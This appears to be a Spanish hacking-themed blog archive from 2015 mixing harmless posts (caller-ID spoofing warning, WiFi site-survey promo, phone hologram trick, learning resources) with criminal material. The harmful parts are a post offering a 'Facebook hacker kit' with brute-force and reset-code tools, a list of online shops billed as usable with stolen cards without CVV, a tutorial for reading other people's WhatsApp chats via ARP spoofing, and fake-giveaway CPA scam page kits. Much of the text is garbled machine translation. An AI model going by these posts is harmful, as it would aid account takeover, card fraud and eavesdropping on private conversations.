jueves, 12 de noviembre de 2015






Generalmente cuando recibimos una llamada telefónica podemos ver el número de la persona que nos llama y, en ocasiones, un nombre asociado a dicho número, aunque no lo tengamos guardado en la agenda. Esto se debe a una serie de funciones del identificador de llamadas donde generalmente empresas pagan para que al realizar llamadas o enviar SMS aparezca el nombre de la empresa y ayude a los usuarios a identificarla fácilmente. Sin embargo, nunca debemos fiarnos de esta característica al 100%.


No te fíes del identificador de llamada. Puede falsificarse fácilmente.
Las estafas telefónicas, por desgracia, están a la orden del día. Aunque en la mayoría de las ocasiones las personas desconfían de estas llamadas, muchos estafadores suelen aprovechar las funciones de identificación de llamada para intentar dar credibilidad a sus estafas. Por desgracia, falsificar este identificador es bastante sencillo y se puede hacer de forma gratuita, por lo que cada vez es una práctica más utilizada.
Aunque suplantar la identidad de una llamada era bastante complicado con la telefonía analógica (al estar todo controlado en centralitas), hacerlo ahora con la telefonía digital y con la VoIP es muy sencillo. Muchos estafadores han uso de estas técnicas ocultando incluso su número de teléfono original, evitando que este pueda ser rastreado y pudiendo así llevar a cabo sus estafas sin ninguna identidad asociada.

Suplantar el identificador de llamadas es sencillo e ilegal a partes iguales

Suplantar la identidad telefónica es muy sencillo. Más allá de la gran cantidad de dispositivos y plataformas utilizadas por los estafadores profesionales, simplemente realizando una búsqueda en Google podremos ver una gran cantidad de páginas que nos permiten ocultar nuestra identidad en las llamadas e incluso modificar nuestro tono de voz de forma gratuita.
Las compañías telefónicas pueden saber el número suplantado, sin embargo, es muy difícil poder saber con certeza el origen de la llamada. Al igual que ocurre cuando enviamos una carta, es posible configurar un “remite” a la llamada al que contestar en caso de tener que llamar nosotros, sin embargo, es muy probable que, al igual que el remite de una carta puede no ser real, el número de respuesta también puede no serlo.
Suplantar el identificador de llamadas no deja de ser muy similar a suplantar la identidad, lo que supone un delito bastante grave. Por muy complicado que sea identificar al emisor de las llamadas falsas prácticamente siempre terminan por ser identificados, no hace falta más que seguir el rastro de bits desde el destino hasta el origen para poder identificar, pese a las suplantaciones, desde donde se originan las llamadas.
La mejor forma de evitar ser víctima de esta falsificación es no confiar nunca en el identificador de llamada. Si recibimos, por ejemplo, una llamada en nombre de nuestro banco lo mejor es siempre acudir presencialmente a la entidad más cercana y comentarlo. De ser verdad que nos han llamado para una gestión realizarla desde allí, de lo contrario, la propia entidad sabrá cómo proceder para poner la denuncia correspondiente. El mismo caso se aplica a llamadas de la policía, bomberos e incluso de un tipo de estafas que está ganando un gran protagonismo, los servicios técnicos no oficiales.
¿Alguna vez han utilizado un identificador falso de llamadas para contactar contigo?
Fuente: redeszone.net


No te fíes del identificador de llamada. Puede falsificarse fácilmente.

Hoy vamos a explicar como localizar puntos de acceso WiFi de forma automática. En ocasiones puede ser necesario intentar localizar la ubicación de un punto de acceso WiFi desplegado en una oficina, en un campus o en las instalaciones de un cliente. Las razones para querer conocer la ubicación de un AP son muy variadas y entre ellas se encuentran:
  • Validar un diseño de red inalámbrica y su correcta instalación.
  • Evidenciar la existencia de puntos de acceso no inventariados.
  • Crear un inventario de los puntos de acceso de la empresa.
  • Identificar puntos de acceso no autorizados en la organización (rogue AP).
  • Encontrar una red WiFi insegura o que provoca interferencias.
  • Encontrar una impresora de la empresa que tiene WiFi habilitado.
  • Investigar y rastrear un punto de acceso desde el que se realizan actividades ilegales.
Habitualmente, la tarea de localizar un punto de acceso requiere hacer uso de analizadores de espectro, como hack RF, o un analizador WiFi con el que ir buscando las zonas de mejor señal e intentar localizar, a mano, donde se encuentra el punto de acceso.
Durante la realización de diferentes análisis WiFi nos hemos encontrado con que la fuente de emisión de señal de redes sospechosas o desconocídas provenía de lugares tan dispares como una placa solar con WiFi en un edificio, una cámara de vídeo vigilancia, un router WiFi conectado en una sala de mantenimiento o un robot en una fábrica. La localización del punto de acceso era necesaria tanto para evaluar si esas redes impactaban a la seguridad de la red como para mantener un inventario actualizado.
 
Por ello, el contar con una herramienta adecuada de rastreo WiFi y triangulación de dispositivos para localizar un punto de acceso es muy útil en ciertas ocasiones y nuestro equipo ha agregado estas funcionalidades de valor añadido en Acrylic WiFi Heatmaps, nuestro producto de site survey WiFi.

localizar la ubicación de un punto de acceso

Para localizar un punto de acceso debemos crear inicialmente un proyecto de site survey en Acrylic WiFi Heatmaps. Una vez creado el proyecto, se deben realizar mediciones de señal en la localización a estudiar utilizando los tres métodos disponibles:
  • Captura con GPS: Si se dispone de un dispositivo GPS, con cobertura, simplemente hay que recorrer el área a analizar con el GPS activo.
  • Captura manual sobre plano o satélite: Seleccionar sobre el plano del edificio o sobre la vista de satélite (Google maps, Bing maps,…) cada posición en la que se van a realizar mediciones de señal y redes.
  • Captura contínua: Con el modo continuo únicamente hay que hacer click en un punto del mapa o plano y comenzar a andar, seleccionando la posicion final al terminar.
Tras este proceso, que se puede demorar entre 5 y 30 minutos dependiendo de la extensión del área en la que queramos realizar un estudio de cobertura WiFi o de triangulación y localización de puntos de acceso, Acrylic WiFi Heatmaps automáticamente empleará varios algoritmos avanzados de triangulación que permitirán localizar todos los puntos de acceso identificados con una alta precisión.
 
 
Por defecto, sólo aquellos puntos de acceso detectados con un nivel de señal mejor de -70dbm son localizados. Esta tarea puede realizarse de forma manual o indicar al software que recalcule nuevamente la ubicación de un punto de acceso y sus resultados se pueden exportar a informes en ficheros compatibles con Word y Google Earth.
La precisión de la triangulación de un punto de acceso también se puede contrastar visualizando el resultado de un mapa de calor WiFi y sus curvas de nivel.

Si necesitas localizar puntos de acceso WiFi, independientemente del motivo, Acrylic WiFi Heatmaps es el software que estas buscando. Puedes descargarlo y probar la versión de evaluación completamente funcional durante 30 días.
 
 

Como localizar la ubicacion de un punto de acceso?

lunes, 17 de agosto de 2015

uno de los hackers famosos de hackers en el mundo, anonghost ha compartido su herramienta privado con sus seguidores. 

Facebook kit de hackers v 1.2 ayuda a hackear la cuenta de Facebook, ya que tiene varias características:

  • Fb brute force
  • Fb ghost catcher
  • Fb reset code
  • Reset code generator
  • Fb id generator
  • Fb id checker
Esta herramienta se codifica por el anonghost.  puede utilizar esta herramienta tanto en su computadora personal (con la xamp o WAMP)  así como se puede utilizar la versión en línea de esta herramienta

ONLINE VERSION(recommended)
http://journalofbiosecuritylaw.com/sites/default/themes/license.php


Now just simply click on the above link(make sure you visit above link with system only)

OFFLINE VERSION(not recommended)
first of all you have to download and install php intreperter (wamp,xamp or anyother you like) ,then after installing it on your computer copy the php code from the below provided link and paste in the notepad and finally save it as yourfilename.php
start your xamp or wamp server
and type
127.0.0.1/yourfilename.php
Php source code: http://pastebin.com/7BDy6zPs
Tor swicther: http://pastebin.com/GLmD7XR8

Facebook hacker kit V 1.2

viernes, 14 de agosto de 2015


Recientemente se ha armado cierto revuelo en torno a Holus, un proyecto de crowdfunding para desarrollar una pantalla de sobremesa que muestra hologramas. No obstante, la mayoría de los hologramas actuales son un efecto más que una tecnología. Todo el mundo sabe lo que son o deberían ser los hologramas - en gran parte gracias a la ciencia ficción de Hollywood - pero todavía estamos muy lejos de conseguirlo.

La ventaja de esa decepción, sin embargo, es que es totalmente posible hacer una visualización 3D decente 'holográfica' con un teléfono inteligente.

Como detalla el usuario de YouTube Mrwhosetheboss, el proceso es sencillo y no requiere nada más de un teléfono, una caja de CD vieja y un cuchillo afilado. Para hacerlo es necesario cortar cuatro formas trapezoidales de plástico - 6 cm de ancho en la parte inferior y 1 cm de ancho en la parte superior - que se peguen entre sí y colocarlos sobre la pantalla del teléfono mientras se reproduce un vídeo preparado para el propósito.

El resultado parece ser muy impresionante, creando lo que parece ser una forma 3D en el centro del 'display'.

En realidad es esencialmente un truco de fiesta (una vez que has visto una mariposa flotante ya las has visto todas), pero es muy interesante como algo nuevo que hacer con el móvil a coste cero y en sólo diez minutos.

Por supuesto, además de estas (aunque muy pequeñas) versiones táctiles, existen otros tipos más impresionantes de hologramas. Por ejemplo, Microsoft Hololens es otro intento de crear objetos aparentemente tangibles en el aire mediante una gafas auriculares. Pero hasta que esas tecnologías estén disponibles para el público, esto podría ser la mejor (y más barata) alternativa.

Cómo transformar tu smartphone en una pantalla holográfica!

martes, 4 de agosto de 2015


Estas paginas algunas estan Online Otras Offline, algunas ya actualisaron otras no chequen ustedes que web sirven.

http://www.pricegrabber.com/
http://www.expansys.com/d_pocketpc.asp (pocket)
http://macmall.com
http://buydig.com
http://apple.com
http://kodak.com
http://worldofwatch.com
http://ritzcamera.com
http://jr.com (hard ship + hard verification)
http://tigerdirect.com (hard ship + hard verification)
http://amazon.com
http://ebay.com
http://hpshopping.com
http://hsn.com/ (no CVV2)
http://www.offgamers.com ( Cd key WOW + card)
http://pagecomputers.com (non CVV2)
=========== UK ==========================
http://www.tesco.com/ (UK)

http://www.storesonline.com/site/minibikesplus (pocket morto)

==== den xe pocket === xenon ==============

http://www.xenonlightshid.com
http://www.advantagewholesaler.com
http://www.epl-hidlighting.com/html/index.htm
http://www.hid-lights.com/ (paypal)

===== mobile ===========
http://plemix.com/Merchant2/merchant...tegory_Code=O2
izzi china :
http://www.samstores.com/details.asp?ProdID=4659
http://www.welectronics.com/gsm/o2/O2_XDA_ATOM.HTML
http://www.expansys.com/search.asp
http://www.expansys-usa.com/product.asp?code=126950
http://www.prestomart.com/product.php?pd=67281
http://www.mobilecityonline.com/wire...og&phoneid=818
http://welectronics.com/gsm/o2/O2_XDA_ATOM.HTML

http://www.bestpriceaudiovideo.com/
http://www.misco.co.uk/
http://www.compuplus.com/
http://www.profeelvideo.com/
http://digitalcameras.kelkoo.co.uk/
http://www.staples.com/
http://www.mwave.com/mwave/
http://www.wolfcamera.com/
http://www.ritzcamera.com/
http://www.officedepot.com/
http://www.vanns.com/
http://www.sears.com/sr/javasr/
http://www.mpsuperstore.com/Digital/discr147929.htm
http://www.wisetronics.com/
http://www.globalcomputer.com/
http://www.ebuyer.com/customer/
http://newsite.pagecomputers.com/
http://www.thenerds.net/
http://www.foxtec.com/products/view.asp?ID=4376
https://order.store.yahoo.com/
http://www.ubid.com/
http://www.x10.com/electronics/

http://www.walmart.com
http://www.shopping.hp.com/
http://www.fingerhut.com/
www.mpsuperstore.com
http://www.compusa.com/
http://www.jr.com/
http://www.computers.us.fujitsu.com/index.shtml
http://www.zones.com/
http://www.sharperimage.com
http://apple.com
http://overstock.com
http://warmart.com
http://www.digitaletailer.com
http://www.abesofmaine.com/
http://www.staples.com
http://www.adorama.com/

http://www.pcrush.com/
http://www.mikescamera.com/

http://dpr-cnet.com.com/
http://www.newegg.com
http://www4.willoughbys.com/
http://www.artray-ap.com/products.htm

http://www.camerasandelectronics.com

http://www.buydig.com/
http://www.etronics.com
http://shopper.cnet.com/
http://www.etronics.com/
http://www.dcresource.com/
http://bigondigital.com/
http://www.dbuys.com/product/
http://www.drplasma.com/index.asp
http://www.centraldigital.com

http://www.sanyo-dsc.com/english/
http://www.circuitcity.com/ccd/home.do
http://www.walgreens.com/
http://www.buymebuyme.com/
http://www.directron.com
http://www.mikescamera.com

Ipod:
http://www.ipodhacks.com/
http://www.everythingipod.com/ (cc)
http://www.extremeipod.com/
http://www.engadget.com/

http://dpr-cnet.com.com/

http://www.dealtime.com/xPC-PowerShot_SD500
https://www.pcconnection.com/
www.globalcomputer.com
www.bestbuy.com
www.buy.com
http://www.ecost.com/

http://www.winbook.com/
http://www.laptopking.com/
http://www.dell.com/
http://www.chinavasion.com/ (camera thu hinh + laptop China) no need CVV2
http://www.hshopping.com/
http://www.pcmall.com/

============hipped WORLDWIDE (ship to HK but fill in some line form your real Country)=============
http://www.karmaloop.com/ (clothes + aparel)
http://fastmac.com/ (MAC accessories)
http://www.sierratradingpost.com/ (clothes + aparels)
http://www.windowsmarketplace.com/de...itemid=2786501
http://www.blackphotostore.com/engli...l.asp?sku=2325'
http://www.oppodigital.com/proddetail.asp?prod=DV970HD'
http://www.mahaenergy.com/store/view...?idproduct=185
http://www.adorebeauty.com.au/adoreb...idproduct=2491
http://www.shoprcubed.com/proddetail...=LS1250&cat=27
http://www.eskincarestore.com/produc...?idCategory=38
http://www.centerplex.com/viewcategory.asp?catid=72
http://www.ateck.com/viewItem.asp?idProduct=453055772
http://www.tabletkiosk.com/tkstore/p...&idproduct=152
http://polywell.com/us/notebook/PolyNoteM719NB.asp
http://www.csa-intl.org/onlinestore/...asp?Parent=428
http://www2.panasonic.com/webapp/wcs...0000000005702#
http://www.myadora.com/ShowProduct.asp?ID=100411397'
http://www.thebowlcompany.com/viewPr...ductId=Ceramic'
http://aryasystem.com/viewProduct.asp
http://www.mwave.com/mwave/viewprodu...Processors+CPU'
http://www.atlantic2u.net/store/view...idproduct=5964
http://www.edishnet.com/ViewProduct....lNumber=42HM66
http://www.abesofmaine.com/viewproduct.asp?id=prdjm800
http://www.mouser.com
http://www.gotobcn.com/product_info....595c135847ab80
http://www.nefec.org/
http://www.shoprcubed.com/
http://www.amuras.com/
http://www.blackphotostore.com/
http://www.amaxit.com/
http://www.circuitcity.com/ccd/home.do

http://www.computers4sure.com

http://www.techdepot.com

http://www.hhgregg.com

http://www.mwave.com

http://www.markaonline.com(bag)

http://www.wearyourcolors.com (clothing)

http://www.eddiebauer.com (clothing)

http://www.acsoutlet.com

ecost.com

http://www.wirelessimports.com/Produ...Category=Nokia (phone shop bill = ship)

http://www.buckyslockerroom.com/Prod...ctCode=5001672 (clothing)

http://www.netdeals4u.com/category_s/ShoppingCart.asp (electronic)

http://www.k12computers.com/shoppingcart.asp?Check=True

http://www.blackdiamondsports.com/Pr...e=TRS%20Access (Patin - shoes)
http://www.nycommsdirect.com/Product...uctCode=9-0007 (electronic)
http://www.killerwarepc.com/Shopping...=SP-LOGIZ5500D (electronic)
http://www2.victoriassecret.com/cate...br=OSBAFZZZZZZ (perfume)
http://www.ae.com (clothes)
http://www.abercrombie.com (clothes)
http://www.1800plasmas.com (electronic)

http://www.discretedrums.com (electronic)

http://www.ricavisionplix.com (electronic)

/www.amphotoworld.com (electronic)

www.belloiris.com (clothing)(

www.cristalier.com (nu trang)

www.s1digital.com (dan loa)

www.amptrondealer.com(electronic +computers)

www.dummyphones.com (cellphones PP payment)

>>>> Paginas Cardeables Sin CVV

viernes, 31 de julio de 2015


Aprender a ser hacker no es tan fácil como aprender a convertirse en un desarrollador de software. Me di cuenta de esto cuando empecé a buscar recursos de aprendizaje para las personas de hacking simples hacen. Incluso a empezar a hacer el truco más simple en el propio, un hacker requiere tener un conocimiento profundo de múltiples temas. Algunas personas recomiendan conocimientos mínimos de los pocos lenguajes de programación como C, Python, HTML con Unix operativo conceptos de sistema y se requiere el conocimiento de redes para empezar a aprender técnicas de hacking.

Aunque se requiere saber un montón de cosas, no es realmente suficiente para que usted sea un hacker competente y exitoso. Usted debe tener una pasión y una actitud positiva hacia la resolución de problemas. Los softwares de seguridad están en constante evolución y por lo tanto deben seguir aprendiendo cosas nuevas con un ritmo muy rápido.

Si usted está pensando en hacking ético como una opción de carrera, puede que tenga que estar preparado para un montón de trabajo duro / inteligente. Espero que estos recursos gratuitos ayudarán a acelerar en su aprendizaje. Si usted decide que usted persigue hacking ético como una opción de carrera, es posible que también desee leer algunos en profundidad los libros de hacking ético.

Una gran cantidad de personas (incluyéndome a mí antes de hacer la investigación para este artículo) piensan que pueden llegar a ser un hacker usando algunas herramientas de hacking gratuitas disponibles en la web. Es cierto que algunos tipos comunes de piratería se puede hacer fácilmente con la ayuda de herramientas, sin embargo haciendo en realidad no te hacen un hacker. Un verdadero hacker es el único que puede encontrar una vulnerabilidad y desarrollar una herramienta para explotar y / o demostrarlo.

El hacking es no sólo de saber "cómo funcionan las cosas", pero su sobre saber "por qué las cosas funcionan así" y "¿cómo podemos impugnarla". 

A continuación se presentan algunos tutoriales de hacking realmente útiles y recursos es posible que desee explorar en su viaje de aprender a hackear.

Aunque se requiere saber un montón de cosas, no es realmente suficiente para que usted sea un hacker competente y exitoso. Usted debe tener una pasión y una actitud positiva hacia la resolución de problemas. Los softwares de seguridad están en constante evolución y por lo tanto deben seguir aprendiendo cosas nuevas con un ritmo muy rápido.

Si usted está pensando en hacking ético como una opción de carrera, puede que tenga que estar preparado para un montón de trabajo duro / inteligente. Espero que estos recursos gratuitos ayudarán a acelerar en su aprendizaje. Si usted decide que usted persigue hacking ético como una opción de carrera, es posible que también desee leer algunos en profundidad los libros de hacking ético.

Una gran cantidad de personas (incluyéndome a mí antes de hacer la investigación para este artículo) piensan que pueden llegar a ser un hacker usando algunas herramientas de hacking gratuitas disponibles en la web. Es cierto que algunos tipos comunes de piratería se puede hacer fácilmente con la ayuda de herramientas, sin embargo haciendo en realidad no te hacen un hacker. Un verdadero hacker es el único que puede encontrar una vulnerabilidad y desarrollar una herramienta para explotar y / o demostrarlo.

El hacking es no sólo de saber "cómo funcionan las cosas", pero su sobre saber "por qué las cosas funcionan así" y "¿cómo podemos impugnarla".

A continuación se presentan algunos tutoriales de hacking realmente útiles y recursos es posible que desee explorar en su viaje de aprender a hackear

Hacking For Dummies – Beginners Tutorials

Estos tutoriales no son realmente simple para cualquier persona que está empezando a aprender las técnicas de hacking. Sin embargo, estos deben ser el punto de partida simple para usted. Estoy seguro de que tiene diferente opinión sobre la complejidad de cada tutorial de hackers obstante avanzada se van a llamar a este un trabajo de script kiddie (hacker de principiante). Incluso para adquirir las habilidades de un script kiddie es necesario tener una buena comprensión de los fundamentos y la programación de computadoras.

1.- Cybrary – Para aquellos que buscan aprender habilidades de hacking ético en línea, Cybrary ofrece la plataforma perfecta para hacerlo. Cybrary es una red en línea gratis de TI y de seguridad cibernética de formación que ofrece instrucción en la forma de su propio ritmo y fáciles de seguir, vídeos. Con cursos sobre temas tales como pruebas de penetración y Ethical Hacking, Advanced pruebas de penetración, Post Explotación Hacking y de informática y hacking Forense, Cybrary proporciona instrucción desde el principiante hasta el nivel altamente avanzado de hacking. Además, Cybrary ofrece material de estudio complementario junto con sus cursos de forma gratuita. Con sus vídeos de formación en profundidad y guías de estudio, Cybrary asegura que los usuarios desarrollen las mejores habilidades de hacking.
2.- Hacking Tutorials for Beginners – By BreakTheSecurity.com
3.- How to learn Ethical hacking – By Astalavista.com
4.- Penetration Testing Tutorial – By Guru99.com
5.- Backtrack Penetration Testing Tutorial
6.- Introduction to Penetration Testing
7.- Information Gathering with Nmap
8.- Simple How To Articles By Open Web Application Security
9.- The Six Dumbest Ideas in Computer Security
10.- Secure Design Principles
11.- 10 steps to secure software.

Cryptography Related Tutorials

La criptografía es debe conocer el tema para cualquier profesional de la seguridad de aspiración o un hacker ético. Usted debe entender cómo se realiza el cifrado y descifrado. Usted debe entender por qué algunas de las viejas técnicas de cifrado no funcionan en el moderno mundo de la computación.

Esta es un área importante y una gran cantidad de programadores de software y profesionales no entienden muy bien. Criptografía Aprender implica un montón de buena comprensión de las matemáticas, esto significa que también es necesario tener buenos fundamentos de la matemática discreta.

1.- Introduction to Public Key Cryptography
2.- Crypto Tutorial
3.- Introduction to Cryptography
4.- An Overview of Cryptography
5.- Cryptography Tutorials – Herong’s Tutorial Examples
6.- The Crypto Tutorial – Learn How to Keep Secret Secret
7.- Introduction to cryptology, Part 1: Basic Cryptology Concepts

Websites For Security Related Articles And News

Estos son algunos sitios web, que puede resultar útil para encontrar recursos piratería y artículos relacionados. Una gran cantidad de sencillos trucos y consejos están disponibles para la experimentación a través de estos sitios para la mejora de sí mismo para convertirse en pirata informático avanzado.

En los últimos años, muchas personas aspiran a aprender a hackear. Con el creciente interés en esta área, una gran cantidad de diferentes tipos de prácticas de hacking están evolucionando. Con la popularidad de las redes sociales muchas personas han inclinado hacia la vulnerabilidad en diferentes redes sociales como Facebook, Twitter y MySpace, etc.

Sobre los últimos problemas de seguridad de aprendizaje continuo, noticias e informes de vulnerabilidad son muy importantes para cualquier hacker o un profesional de la seguridad. Algunos de los sitios que mantienen a la publicación de artículos informativos y de noticias se enumeran aquí.

http://www.astalavista.com/
http://packetstormsecurity.com/
http://www.blackhat.com/
http://www.metasploit.com/
http://sectools.org/
http://www.2600.com/
DEF CON – Hacking conference
http://www.breakthesecurity.com/
http://www.hacking-tutorial.com/
http://www.evilzone.org/
http://hackaday.com/
http://www.hitb.org/
http://www.hackthissite.org/
http://pentestmag.com
http://www.securitytube.net/
https://www.ssllabs.com/

EBooks And Whitepapers

Algunos de los trabajos de investigación por expertos en seguridad y los gurús le puede proporcionar una gran cantidad de información e inspiración. Los libros blancos pueden ser muy difíciles de leer y entender, por tanto, puede que tenga que leerlos varias veces. Una vez que entienda bien el tema, la lectura se convertirá en mucho más rápido y usted será capaz de leerlo a través de un contenido mucho en menos tiempo.

1.- Handbook of Applied Cryptography – This ebook contains some free chapter from one of the popular cryptography books. The full book is also available on amazon at Cryptography Book.
2.- Network Penetration testing Guide
3.- How to hack anything in Java
4.- Mcafee on iPhone and iPad Security
A Good Collection of White papers on security and vulnerabilities – This site contains collection of white papers from different sources and some of these white papers are really worth referring.
6.- Engineering Principles for Information Technology Security
7.- Basic Principles Of Information Protection
8.- Open Web Application Security Project – OWASP is one of the most popular sites that contains web application security related information .

Videos & Play Lists

Aquellos que les gusta ver videos de tutoriales, aquí son pocos me gustó. Sin embargo, hay muchos pequeños video disponible en YouTube. Siéntase libre de explorar más y compartir con nosotros si te gusta algo.

1.- Cryptography Course By Dan Boneh Stanford University
2.- Open Security Training– Youtube Playlist of More than 90 hours. I have found this to be the biggest free training available for security related topic.
3.- OWASP AppSec USA 2011: Youtube Playlist containing compilation of OWASP conference highlight in 2011.
4.- Defcon: How I Met your Girlfriend – Defcon is one of the most popular hacker conference. The presenters in this conference are well know inside the hacking industry.
5.- Defcon: What happens when you steal a hackers computer
6.- Defcon: Nmap: Scanning the Internet
7.- Public Key Cryptography: Diffie-Hellman Key Exchange
8.- Web application Pen testing
9.- Intro to Scanning Nmap, Hping, Amap, TCPDump, Metasploit

Forums For Hackers And Security Professionals


Al igual que cualquier otra área, los foros son realmente de gran ayuda para el aprendizaje de otros expertos. Cientos de expertos en seguridad y los hackers éticos / no-éticos están dispuestos a compartir sus conocimientos en los foros, por alguna razón. Por favor, tenga en cuenta para hacer más investigación antes de publicar una pregunta y ser amable con las personas que toman el tiempo para responder a su pregunta.

1.- Stackoverflow for security professionals
2.- http://darksat.x47.net/
3.- http://forums.securityinfowatch.com/
4.- http://forums.cnet.com/spyware-viruses-security-forum/
5.- http://www.hackforums.net/forumdisplay.php?fid=47

Vulnerability Databases And Resources

Bases de datos de vulnerabilidad son el primer lugar para comenzar su día como un profesional de la seguridad. Cualquier nueva detección de la vulnerabilidad está generalmente disponible a través de las bases de datos de vulnerabilidades públicas. Estas bases de datos son una gran fuente de información para los hackers puedan entender y explotar / evitar / corregir la vulnerabilidad.

1.-http://www.exploit-db.com/
2.-http://1337day.com/
3.- http://securityvulns.com/
4.- http://www.securityfocus.com/
5.- http://www.osvdb.org/
6.- http://www.securiteam.com/
7.- http://secunia.com/advisories/
8.- http://insecure.org/sploits_all.html
9.- http://zerodayinitiative.com/advisories/published/
10.- http://nmrc.org/pub/index.html
11.- http://web.nvd.nist.gov
12.- http://www.vupen.com/english/security-advisories/
13.- http://www.vupen.com/blog/
14.- http://cvedetails.com/
15.- http://www.rapid7.com/vulndb/index.jsp
16.- http://oval.mitre.org/

Product Specific Vulnerability Information

Algunos de los productos muy populares en el mundo requieren una atención especial y por lo tanto, es posible que desee ver en los sitios web específicos de seguridad directamente de los proveedores. He guardado Linux. Microsoft y apache en esta lista, sin embargo, se pueden aplicar a cualquier producto que puede ser en gran medida utilizando.

1.- Red Hat Security and other updates Site
2.- Microsoft Products Security Bulletin
3.- Apache Foundation Products Security Repository
4.- Ubuntu Software Security Center
5.- Linux Security Repository

Tools And Programs For Hacking / Security

Hay docenas de herramientas disponibles para hacer diferentes tipos de piratería y las pruebas. Las herramientas son realmente importantes para ser más productivo en tu trabajo. Algunas de las herramientas muy comunes que son utilizados por los piratas informáticos se enumeran aquí. Usted puede tener diferentes opciones de herramientas basadas en su propia comodidad.


1.- nmap
2.- NSS
3.- Hping
4.- TCPDump
5.- Metasploit
6.- Wireshark
7.- Network Stuff
8.- Nikto

RESUMEN

He tratado de compilar algunos de estos recursos para mi propia referencia para el viaje de aprendizaje que voy a empezar. No estoy incluso a un nivel principiante de convertirse en pirata, pero el conocimiento de este campo realmente me fascina y me mantiene motivado para aprender más y más. Espero que sea capaz de tener éxito en esto.

Una gran cantidad de personas que utilizan sus habilidades de conocimiento para romper cosas y robar. Personalmente, creo que el hacer daño a alguien es una elección débil y no tendrá un buen final. Yo recomendaría no usar sus habilidades para cualquier empresa no-ética. Un único mal uso de su habilidad puede poner en peligro su carrera desde la mayoría de las empresas hacen una estricta terceros verificación de antecedentes antes de contratar un hacker ético o un personal de seguridad.

Hay docenas de empresas en busca de hackers éticos y profesionales de la seguridad. En realidad, hay buen número de oportunidades en esta área y su realmente segmento compensación nicho. Usted será fácilmente capaz de conseguir un trabajo decente sin siquiera adquirir todas las competencias a nivel de expertos para convertirse en un profesional de piratería informática.

80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker!

miércoles, 22 de julio de 2015


En este tutorial os vamos a enseñar cómo utilizar WhatsApp Sniffer para obtener fácilmente las conversaciones de WhatsApp de la gente que esté conectada a una misma red wireless, también os enseñaremos a evitar ser espiados, que es aún más importante.

Espiar conversaciones ajenas es ilegal, además de poco ético, así que usa esta información bajo tu propia responsabilidad, al fin y al cabo, el conocimiento humano pertenece al mundo.

En RedesZone ya hablamos sobre esta aplicación aquí: WhatsAppSniffer : ¿Funciona en todas las redes Wi-Fi?

WhatsApp sniffer ya no se encuentra disponible en la Play Store por razones obvias, pero se puede conseguir fácilmente buscando por la red o pinchando en nuestro enlace. Dispone de una versión gratuita, soportada por publicidad y una versión de pago que elimina dicha publicidad.



Lo primero que debemos hacer es descargarnos de internet el instalador .apk e instalarlo en nuestro dispositivo Android, ya sea una tablet o un smartphone. A continuación lo ejecutamos presionando sobre el icono que nos habrá creado en el menú de aplicaciones.

La primera pantalla que veremos será la pantalla principal del programa con un aviso que nos indica que si estamos conectados a nuestra red con cifrado WPA debemos activar la opción ARP-Spoof.

WhatsApp Sniffer necesita permisos de superusuario (ROOT) y busybox para funcionar.

Para empezar a espiar conversaciones debemos pulsar sobre “start” en la parte inferior de la pantalla, y nos pedirá permisos de superusuario. Se los concedemos y el programa empieza a buscar conversaciones por WhatsApp en nuestra red. Cuando consiga alguna conversación nos aparecerán listadas en la pantalla principal del programa, junto a un aviso en la barra de notificaciones.

Debemos recordar activar la opción ARP-Spoof si estamos en nuestra red y utilizamos WPA/WPA2.

¿Cómo podemos evitar ser espiados por WhatsApp?

WhatsApp es una aplicación muy insegura en todos los aspectos. Las conversaciones pueden ser leídas por cualquiera con ciertos conocimientos ya que viajan sin cifrar por la red.

Para evitar que nos las espíen mediante un Sniffer como WhatsApp Sniffer, debemos utilizar WhatsApp mediante nuestra conexión de datos, ya que es mas difícil (aunque no imposible) que nos espíen mediante GSM/3G, o usar un túnel VPN a nuestro servidor. En el artículo WhatsAppSniffer : ¿Funciona en todas las redes Wi-Fi? hablamos sobre esto.

También existen otros programas como WhatsApp Xtract que permiten descifrar los archivos /sdcard/WhatsApp/Databases/msgstore.db.crypt, /data/data/com.whatsapp/databases/msgstore.db y wa.db y net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite

Un analizador de redes como WireShark para PC también puede capturar el tráfico de WhatsApp sin gran dificultad, aunque deberemos filtrar los resultados, esta aplicación WhatsApp Sniffer hace lo mismo que Wireshark pero filtrando lo que nos interesa (las conversaciones).

Como podemos ver, hay diversas maneras de espiar conversaciones de WhatsApp, por lo que, la mejor forma de evitar llevarnos un disgusto es no hablar de cosas comprometidas ni enviar por esta red datos personales importantes.



>>> WhatsApp Sniffer

miércoles, 8 de julio de 2015

Si te estás perdiendo una idea de por dónde empezar con CPA, tengo un par de guiones prefabricados me he reunido durante años. Yo no te prometo nada, todo lo que puedo decir, si se trata de poner en buen uso, un dólar o dos se harán (no literalmente, lol). También antes de intentar usarlo, tenga en cuenta, más saturado el mercado es, más gente quiere.

He aquí un par se puede descargar al instante o si quieres un especial puede dejar una respuesta en un hilo y si lo tengo, voy a enviar a la vuelta. 

SCRIPT:

Xbox Live Gold Membership Cards


DOWNLOAD:
--------------------------------------------------------------------

PSN Cards Giveaway


DOWNLOAD:
----------------------------------------------------------------

League of Legends RIOT Points


DOWNLOAD:
------------------------------------------------------------------

Facebook Hacker


DOWNLOAD:
-------------------------------------------------------------------------------

Beats by Dr.Dre


DOWNLOAD:
http://cur.lv/ns9k7
-------------------------------------------------------------------

iTunes - Amazon Gift Cards


DOWNLOAD:
http://cur.lv/ns9lf
----------------------------------------------------------------------

Estos scripts requiere poca o ninguna modificación. Lo que tienes que hacer es abrir index.html y cambiar el código a la suya. Si quieres molestia contenido libre locker sugiero usarlo en las redes del PPD, si desea personalizar el vestuario para parecer el sitio real ir a Adwork Medios.

FACEBOOK:
https://www.facebook.com/groups/1678387022396635/?fref=ts

FREE Viral Scripts [ CPA/PPD ] [ INSTANT DOWNLOAD ]

martes, 7 de julio de 2015


Estoy aquí con un nuevo tutorial para usted. Yo sé que todos y todo el mundo quiere llamar de forma gratuita. Con la mayoría de los servicios de VoIP, usted puede hacer llamadas ilimitadas de teléfono gratuita en cualquier lugar, pero sólo bajo una condición. La condición es que sólo se puede hablar de un cierto tiempo, como 10 segundos o así, o si necesita estar llamando a alguien en el mismo servicio.
En este tutorial voy a mostrar cómo hacer del mundo libres de las llamadas telefónicas de ancho y hablar todo lo que quieras.

Vamos a empezar:

USTED NECESITA Java instaladas en el PC
SI USTED NO TIENE JAVA descargar desde aquí
http://cur.lv/nqu4i

DESPUÉS

En primer lugar FriendCaller descarga desde AQUÍ
http://cur.lv/nqu5j

